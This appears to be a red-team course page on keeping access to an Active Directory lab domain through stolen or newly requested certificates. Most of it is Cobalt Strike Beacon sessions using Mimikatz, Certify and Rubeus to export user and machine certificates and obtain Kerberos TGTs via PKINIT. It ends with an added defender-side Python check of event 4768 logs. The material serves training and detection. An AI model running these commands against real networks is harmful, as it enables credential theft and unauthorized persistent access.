User & Computer Persistence
Certificates can also be useful for maintaining persistent access to both users and computers, because they tend to have a longer shelf-life than passwords. For example, certificates issued from the default User template are valid for an entire year, and remain valid regardless of password changes.
CA Name : dc-2.dev.cyberbotic.io\sub-ca
Template Name : User
Schema Version : 1
Validity Period : 1 year
Certificates only become invalid if they're revoked by the CA (or expire). This technique also does not rely on any vulnerable templates: we can extract certificates that have already been issued, or just request new ones.
User Persistence
User certificates that have already been issued can be found in the user's Personal Certificate store.
If we have a Beacon running on their machine, we can enumerate their certificates with Seatbelt.
beacon> getuid
[*] You are DEV\nlamb
beacon> run hostname
wkstn-1
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates
StoreLocation : CurrentUser
Issuer : CN=sub-ca, DC=dev, DC=cyberbotic, DC=io
Subject : E=nlamb@cyberbotic.io, CN=Nina Lamb, CN=Users, DC=dev, DC=cyberbotic, DC=io
ValidDate : 9/7/2022 11:44:35 AM
ExpiryDate : 9/7/2023 11:44:35 AM
HasPrivateKey : True
KeyExportable : True
Thumbprint : 43FA3C3AE4E1212A3F888937745C2E2F55BAC1B5
Template : User
EnhancedKeyUsages :
Encrypting File System
Secure Email
Client Authentication [!] Certificate is used for client authentication!
Always check that the certificate is valid for client authentication, since that is what allows it to be used for PKINIT.
Certificates can be exported with Mimikatz using crypto::certificates (although it drops them to disk).
beacon> mimikatz crypto::certificates /export
Public export : OK - 'CURRENT_USER_My_0_Nina Lamb.der'
Private export : OK - 'CURRENT_USER_My_0_Nina Lamb.pfx'
beacon> download CURRENT_USER_My_0_Nina Lamb.pfx
[*] started download of C:\Users\nlamb\CURRENT_USER_My_0_Nina Lamb.pfx (3454 bytes)
[*] download of CURRENT_USER_My_0_Nina Lamb.pfx is complete
Go to View > Downloads to sync files from Cobalt Strike to your local machine.
Base64 encode the pfx file.
ubuntu@DESKTOP-3BSK7NO ~> cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 0
Then use it with Rubeus to obtain a TGT. The export password will be mimikatz.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIINeg[...]IH0A== /password:mimikatz /nowrap
[*] Using PKINIT with etype rc4_hmac and subject: E=nlamb@cyberbotic.io, CN=Nina Lamb, CN=Users, DC=dev, DC=cyberbotic, DC=io
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQj[...]5pbw==
ServiceName : krbtgt/dev.cyberbotic.io
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : nlamb
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/7/2022 12:28:51 PM
EndTime : 9/7/2022 10:28:51 PM
RenewTill : 9/14/2022 12:28:51 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : Cptkd+BVLZ8+NS11BQQ6Zg==
ASREP (key) : 79C05DC0CC7909DF6448F1B24FAFBD71
OPSEC
You may notice that this will request RC4 tickets by default. You can force the use of AES256 by including the /enctype:aes256 parameter.
If the user does not have a certificate in their store, we can just request one with Certify.
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:User
Computer Persistence
The same can be applied to computer accounts, but we must elevate to extract those certificates from the local machine store.
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
Public export : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.der'
Private export : OK - 'local_machine_My_0_wkstn-1.dev.cyberbotic.io.pfx'
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz /nowrap
[*] Action: Ask TGT
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN=wkstn-1.dev.cyberbotic.io
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\WKSTN-1$'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGYD[...]5pbw==
ServiceName : krbtgt/dev.cyberbotic.io
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : WKSTN-1$
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/7/2022 12:06:02 PM
EndTime : 9/7/2022 10:06:02 PM
RenewTill : 9/14/2022 12:06:02 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 6DV6vQB5lRoCz84qmRqt0X6UdIzzdQiX+y0IwwDrHlc=
ASREP (key) : C1B715AF5F9B5468EB5FA8ADDA0E02EE2D7548F439DEA5A5D9B4F7DFA6482BDF
If requesting a machine certificate with Certify, the /machine parameter is required to auto-elevate to SYSTEM and assume the identity of the computer account.
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:Machine /machine
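Added example (not part of the course material): a defender-side check over Windows Security event 4768 records, which carry the pre-authentication type and certificate thumbprint whenever a TGT is obtained via PKINIT as in the user and computer procedures above. It assumes the events have already been parsed into dicts keyed by the 4768 field names; the CA issuance inventory, host IPs, the jsmith/WKSTN-1$ thumbprints and the events themselves are constructed.

```python
from dataclasses import dataclass

PA_PK_AS_REQ = 16   # RFC 4556 pre-authentication type: client authenticated with a certificate
RC4_HMAC = 0x17     # 4768 TicketEncryptionType for RC4-HMAC; AES256 is 0x12

@dataclass(frozen=True)
class Finding:
    user: str
    reason: str

def check_pkinit_events(events, issued, host_ips):
    """Return Findings for 4768 events that used PKINIT pre-authentication.

    events   - list of dicts carrying the 4768 fields referenced below (assumed pre-parsed)
    issued   - dict: certificate thumbprint -> account the CA issued it to
    host_ips - dict: machine account ('WKSTN-1$') -> its expected source IP
    """
    findings = []
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("PreAuthType") != PA_PK_AS_REQ:
            continue  # password-based or other pre-auth: not certificate-based logon
        user = ev["TargetUserName"]
        thumb = ev.get("CertThumbprint", "").upper()
        owner = issued.get(thumb)
        if owner is None:
            findings.append(Finding(user, "PKINIT with certificate absent from CA issuance records"))
        elif owner.lower() != user.lower():
            findings.append(Finding(user, f"certificate issued to {owner} used for {user}"))
        if ev.get("TicketEncryptionType") == RC4_HMAC:
            # Windows PKINIT logons negotiate AES; an RC4 TGT points at a tool default
            findings.append(Finding(user, "PKINIT TGT issued with RC4 (0x17) encryption"))
        if user.endswith("$") and ev.get("IpAddress") != host_ips.get(user):
            findings.append(Finding(user, f"machine certificate used from {ev.get('IpAddress')}"))
    return findings

# Constructed samples: the nlamb thumbprint is the one shown on this page, the rest is made up.
SAMPLE_ISSUED = {"43FA3C3AE4E1212A3F888937745C2E2F55BAC1B5": "nlamb",
                 "1111111111111111111111111111111111111111": "jsmith",
                 "2222222222222222222222222222222222222222": "WKSTN-1$"}
SAMPLE_HOST_IPS = {"WKSTN-1$": "10.10.122.30"}
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "jsmith", "PreAuthType": 16, "TicketEncryptionType": 0x12,
     "IpAddress": "10.10.122.40", "CertThumbprint": "1111111111111111111111111111111111111111"},
    {"EventID": 4768, "TargetUserName": "nlamb", "PreAuthType": 16, "TicketEncryptionType": 0x17,
     "IpAddress": "10.10.122.30", "CertThumbprint": "43fa3c3ae4e1212a3f888937745c2e2f55bac1b5"},
    {"EventID": 4768, "TargetUserName": "WKSTN-1$", "PreAuthType": 16, "TicketEncryptionType": 0x12,
     "IpAddress": "10.10.122.99", "CertThumbprint": "2222222222222222222222222222222222222222"},
    {"EventID": 4768, "TargetUserName": "nlamb", "PreAuthType": 2, "TicketEncryptionType": 0x12},
]
```

Running check_pkinit_events over SAMPLE_EVENTS flags the RC4 PKINIT request for nlamb and the machine certificate used from an unexpected address, while the normal AES smart-card logon and the password-based request produce nothing.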